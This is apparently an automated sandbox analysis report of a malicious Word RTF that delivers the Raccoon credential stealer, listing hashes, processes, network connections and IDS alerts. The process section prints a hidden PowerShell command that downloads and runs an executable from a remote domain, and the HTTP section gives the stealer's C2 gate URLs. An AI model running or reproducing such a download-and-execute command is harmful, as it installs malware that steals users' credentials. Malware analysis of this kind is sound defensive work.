File name:

0062_13012020.doc

Full analysis: https://app.any.run/tasks/d66838de-ea57-4dc8-81b1-26da14710bd9
Verdict: Malicious activity
Threats:

Raccoon is an info stealer type malware available as a Malware as a Service. It can be obtained for a subscription and costs $200 per month. Raccoon malware has already infected over 100,000 devices and became one of the most mentioned viruses on the underground forums in 2019.

Analysis date: January 13, 2020, 11:04:13
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
maldoc-13
trojan
opendir
loader
raccoon
stealer
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

227149093595883E873B255625A9826F

SHA1:

24E4A1A22B6E3F24CE22C1BE855494223724E152

SHA256:

4B48814CE6E5414710884DFEC169D0CB7D1C9BEAF30C268324D57C8106A9B78C

SSDEEP:

1536:mhbKTRtnpTvJEdh61RVueReVeEeyfzf/PxtoKXngRPLgMNAKrNbui3FRIxPILSQN:mhAWPARmxgLSQWnA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • cham.exe (PID: 2492)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 4084)
    • Executable content was dropped or overwritten

      • WINWORD.EXE (PID: 4084)
    • Requests a remote executable file from MS Office

      • WINWORD.EXE (PID: 4084)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 4084)
    • Downloads executable files from the Internet

      • PowerShell.exe (PID: 2212)
      • cham.exe (PID: 2492)
    • Connects to CnC server

      • cham.exe (PID: 2492)
    • RACCOON was detected

      • cham.exe (PID: 2492)
    • Loads dropped or rewritten executable

      • cham.exe (PID: 2492)
    • Stealing of credential data

      • cham.exe (PID: 2492)
    • Downloads executable files from IP

      • cham.exe (PID: 2492)
    • Actions looks like stealing of personal data

      • cham.exe (PID: 2492)
  • SUSPICIOUS

    • Creates files in the program directory

      • WINWORD.EXE (PID: 4084)
    • Creates files in the user directory

      • PowerShell.exe (PID: 736)
      • PowerShell.exe (PID: 2212)
    • Executable content was dropped or overwritten

      • PowerShell.exe (PID: 2212)
      • cham.exe (PID: 2492)
    • Connects to server without host name

      • cham.exe (PID: 2492)
    • Reads the cookies of Google Chrome

      • cham.exe (PID: 2492)
    • Reads the cookies of Mozilla Firefox

      • cham.exe (PID: 2492)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 4084)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 4084)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe powershell.exe no specs powershell.exe #RACCOON cham.exe

Process information

PID
CMD
Path
Indicators
Parent process
4084"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0062_13012020.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
736PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://nileapi.com/wp-admin/network/files/cham.exe','C:\Users\admin\AppData\Roaming\cham.exe');Start-Process 'C:\Users\admin\AppData\Roaming\cham.exe'"C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2212PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://nileapi.com/wp-admin/network/files/cham.exe','C:\Users\admin\AppData\Roaming\cham.exe');Start-Process 'C:\Users\admin\AppData\Roaming\cham.exe'"C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2492"C:\Users\admin\AppData\Roaming\cham.exe" C:\Users\admin\AppData\Roaming\cham.exe
PowerShell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Total events
2 518
Read events
2 054
Write events
0
Delete events
0

Modification events

No data
Executable files
62
Suspicious files
6
Text files
12
Unknown types
3

Dropped files

PID
Process
Filename
Type
4084WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRDFA1.tmp.cvr
MD5:
SHA256:
4084WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D48A0485.png
MD5:
SHA256:
736PowerShell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QDNZDCR07QKGEV0GKVXP.temp
MD5:
SHA256:
2212PowerShell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A4COWL8ESINLFGR2ZY3Q.temp
MD5:
SHA256:
2492cham.exeC:\Users\admin\AppData\LocalLow\frAQBc8Wsa
MD5:
SHA256:
2492cham.exeC:\Users\admin\AppData\LocalLow\1xVPfvJcrg
MD5:
SHA256:
2492cham.exeC:\Users\admin\AppData\LocalLow\RYwTiizs2t
MD5:
SHA256:
2492cham.exeC:\Users\admin\AppData\LocalLow\rQF69AzBla
MD5:
SHA256:
2492cham.exeC:\Users\admin\AppData\LocalLow\AdLibs\ff-funcs.zip
MD5:
SHA256:
4084WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\cham[1].exeexecutable
MD5:5093CE77D3650611497DD7435031549C
SHA256:77AB9794D04CF12565AB30A16D84F531AE28662CBC11582A826DF3EB6BB728C1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
6
DNS requests
3
Threats
20

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4084
WINWORD.EXE
GET
200
104.24.119.10:80
http://nileapi.com/wp-admin/network/files/cham.exe
US
executable
534 Kb
malicious
2212
PowerShell.exe
GET
200
104.24.119.10:80
http://nileapi.com/wp-admin/network/files/cham.exe
US
executable
534 Kb
malicious
2492
cham.exe
POST
200
35.240.77.90:80
http://35.240.77.90/gate/log.php
US
text
399 b
malicious
2492
cham.exe
GET
200
35.240.77.90:80
http://35.240.77.90/gate/sqlite3.dll
US
executable
895 Kb
malicious
2492
cham.exe
GET
200
35.240.77.90:80
http://35.240.77.90/gate/libs.zip
US
compressed
2.70 Mb
malicious
2492
cham.exe
POST
200
35.240.77.90:80
http://35.240.77.90/file_handler/file.php?hash=bbc9d7a6f17bbad87d7152ff996495692cff1bc4&js=09e0408a8dfbe00dfad868e00598726a95afc260&callback=http://35.240.77.90/gate
US
text
13 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4084
WINWORD.EXE
104.24.119.10:80
nileapi.com
Cloudflare Inc
US
shared
2212
PowerShell.exe
104.24.119.10:80
nileapi.com
Cloudflare Inc
US
shared
2492
cham.exe
216.58.207.46:443
drive.google.com
Google Inc.
US
whitelisted
2492
cham.exe
172.217.22.1:443
doc-10-cc-docs.googleusercontent.com
Google Inc.
US
whitelisted
2492
cham.exe
35.240.77.90:80
US
malicious

DNS requests

Domain
IP
Reputation
nileapi.com
  • 104.24.119.10
  • 104.24.118.10
malicious
drive.google.com
  • 216.58.207.46
shared
doc-10-cc-docs.googleusercontent.com
  • 172.217.22.1
shared

Threats

PID
Process
Class
Message
4084
WINWORD.EXE
A Network Trojan was detected
ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious
4084
WINWORD.EXE
A Network Trojan was detected
AV TROJAN Possible infected Wordpress - Payload download attempt
4084
WINWORD.EXE
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2212
PowerShell.exe
A Network Trojan was detected
ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious
2212
PowerShell.exe
A Network Trojan was detected
AV TROJAN Possible infected Wordpress - Payload download attempt
2212
PowerShell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2212
PowerShell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2492
cham.exe
A Network Trojan was detected
AV TROJAN Trojan-Spy.MSIL.Stealer.ahp CnC Checkin
2492
cham.exe
A Network Trojan was detected
STEALER [PTsecurity] Stealer.Raccoon
2492
cham.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host DLL Request
2492
cham.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
2492
cham.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2492
cham.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2
2492
cham.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2
2492
cham.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host ZIP Request
2492
cham.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan.Loader (Trojan.Agent.DDSA) Requesting Zip Archive
3 ETPRO signatures available at the full report
No debug info